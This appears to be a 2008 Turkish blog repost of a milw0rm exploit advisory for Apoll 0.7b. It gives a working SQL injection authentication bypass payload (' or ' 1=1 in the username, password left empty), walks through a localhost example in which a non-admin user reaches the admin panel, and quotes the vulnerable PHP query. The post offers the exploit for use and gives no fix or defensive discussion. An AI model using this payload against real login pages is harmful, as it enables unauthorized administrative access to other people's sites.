Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability

3 Kasım 2008 Pazartesi

Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability

Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability

link: http://www.milw0rm.com/exploits/6969

Discovered By: ZoRLu

admin login:

http://localhost/apoll/admin/index.php

Exploit:

username: [real_admin_or_user_name] ' or ' 1=1

password: dont write anything

note: generally admin name: admin

example for my localhost:

admin: zorlu

user: salla

username: zorlu ' or ' 1=1

password: empty

or ý added user salla and apply take to true result ( salla is not admin but you login admin panel : ) )

username: salla ' or ' 1=1

password: empty

file:

apoll/admin/index.php

code:

$user = $_SESSION['user'];
$pass = $_SESSION['pass'];

$mysql = @mysql_query("SELECT * FROM ap_users WHERE username='$user' AND password='$pass'");
$num = @mysql_num_rows($mysql);

ZoRLu | ZRL | Buffer Overflow

3 Kasım 2008 Pazartesi

Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability

0 yorum:

About Me

Blog Archive

İzleyiciler

Bağlantılarım

Inj3ct0r.com